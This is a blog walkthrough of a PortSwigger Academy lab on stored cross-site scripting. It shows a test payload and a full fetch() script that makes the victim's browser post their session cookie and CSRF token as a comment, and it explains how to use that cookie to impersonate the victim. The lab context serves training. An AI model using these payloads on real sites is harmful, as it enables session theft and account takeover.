Exploiting XSS to Steal Cookies(Portswigger Web Security Academy)

Hello, welcome to my first blog on medium. In this blog, I will guide you on how to do XSS to steal cookie (without using burp collaborator).

Disclaimer:

  1. The lab I’m using here is from Portswigger Web Security Academy. Here is the lab that’s used in this blog: XSS lab.
  2. I’m not doing this on my own. Big thanks to Khalid143 on Cybr discord server for helping me figure out how to do this.
  3. Other people may have already found out how to do this before I did, so I want to say that I’m not the one who develop/made this attack technique.

Lab description:

“This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim’s session cookie, then use this cookie to impersonate the victim.”

There is also a note on the lab’s :

“To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you should use Burp Collaborator’s default public server (burpcollaborator.net).”

Now, here is what’s interesting:

“Some users will notice that there is an alternative solution to this lab that does not require Burp Collaborator. However, it is far less subtle than exfiltrating the cookie.”

Okay, that’s interesting. We can steal the victim’s cookie without using Burp Collaborator.

Let’s jump right into the lab..

Oh, wait a minute. Before you continue reading this blog, I hope you already know XSS. I won’t cover what XSS is here. If you don’t know about XSS, you can read about it on Portswigger Web Security Academy.

The website’s page

From what I read on the lab’s description, the vulnerability is in the blog comments function. So, let’s take a look at the comment function.

Part of comment function

So, there is a “Comments” section on each post. At the bottom of “Comments” section, you can see there is “Leave a comment” section. Let’s take a closer look at it.

“Leave a comment” section

There, we can see several input fields. Now, by seeing all of this we could know that what we type in “Comment” & “Name” field will be displayed on the “Comments” section. Let’s check if either of them is vulnerable to XSS by using a simple payload:

<img src=0 onerror=print()>

The above payload will insert an html image tag with image source of 0 (which will trigger an error when loading the image since 0 refers to nothing). If the image cannot be loaded, it will execute a JavaScript function called print(). This print() function will then open a pop-up window to print the content of the current window.

Using that payload on “Comment” field:

XSS basic test on “Comment” field

After I clicked on the “Post Comment” button, I got redirected to another page telling me that my comment has been submitted.

Redirected page

When I clicked “< Back to blog” button, a print pop up window came out.

Pop up window

With this, I have verified that the “Comment” field is vulnerable to XSS!

GIF source: https://giphy.com/gifs/happy-spongebob-squarepants-patrick-TdfyKrN7HGTIY

Now that we have known which part is vulnerable to XSS, we can do several things, like exfiltrate the victim’s session cookie to our collaborator server. But instead of doing that, I want to make the victim post their session cookie to the “Comments” section.

To get session cookie, we are going to use:

document.cookie;

Now, let’s take a look at the POST request when we post a comment. You can do this using Burp Suite by intercepting the request or seeing the HTTP history (I’m going to use this one).

HTTP POST request when I want to submit a comment

Take a look at the body of the POST request. There, you can see postId, comment, name, email, and website. But wait a minute, how can we determine the csrf value??

Well, I can determine the csrf value using:

document.getElementsByTagName(“input”)[0].getAttribute(“value”);

But how could I know that script will return csrf value? Here is the explanation:

  1. View the page source and scroll down to line 100
  2. You can see there are several input there, including hidden csrf value.
  3. Using document.getElementsByTagName(“input”), I can retrieve all html code that are using <input> tag. Since there are several <input> tags, I need to specify which one I want to retrieve. I did this using [0], since csrf value is on the first input tag. If it’s on the second input tag, you can use [1].
  4. Using getAttribute(“value”), I could retrieve the “value” of csrf input field.
line 100

You can try that script on console, to make sure everything works.

Script test on console

Now that we have got everything we need, we can build the script to make the victim post their cookie on the “Comments” section. To do this, I’m going to use fetch(), using the POST method.

Here is the script:

<script>
window.onload = function () {
var data = “csrf=” + document.getElementsByTagName(“input”)[0].getAttribute(“value”) + “&postId=9&comment=” + document.cookie + “&name=hacker&email=test@test.com&website”
fetch(‘
https://lab-id.web-security-academy.net/post/comment', {
method: ‘POST’,
mode: ‘no-cors’,
body: (data)
});
};
</script>

  1. The script above will execute a function after the webpage has completely loaded (using window.onload). Without using window.onload, csrf value could be undefined since it’s not loaded yet when the script got executed.
  2. On the function, we declare a variable called “data” and set csrf value, postId, comment (with session cookie as the value), name, email, and website.
  3. After declaring the variable, we use fetch() to make a POST request to post a comment, with (data) variable’s value as the body.

Note: Make sure you type the correct postId, so you won’t find any trouble looking for the victim’s comment.

That’s it, let’s post the malicious comment.

Post the malicious comment

After I clicked Post Comment, the comment got submitted!!

Malicious comment submitted

When I clicked “< Back to blog” button, I can immediately see the victim’s session cookie!

Victim’s session cookie

Now, you can grab the cookie and use the victim’s cookie to impersonate the victim and the lab is solved.

GIF source: https://giphy.com/gifs/Ge86XF8AVY1KE

Okay!! I think that’s it for this blog. I’m sorry if my grammar is bad, but I hope you enjoy this blog. See you on the next blog!

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

From The 18th Century to the 21st Century: Morse Code To Ethereum

File Inclusion Basics — THM(With Notes)

{UPDATE} Camper Van Offroad 4x4 Truck Hack Free Resources Generator

MPC Techniques Series, Part 7: Homomorphic Encryption

Upgrade for staking campaign

{UPDATE} Outlaws - Dirt Track Racing Hack Free Resources Generator

From TDR to TDIR — using tools to drive investigations

Hacking one of the biggest Japanese car company in the world and buying any car for 0$-$50

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
f0x$root

f0x$root

More from Medium

Vulnhub: XSS AND MYSQL FILE (Walkthrough)

Utilization of OWASP Tools to protect against XSS vulnerabilities

Lab: Blind SQL injection with conditional errors 💉

Intigriti XSS Challenge 0222 — Write-Up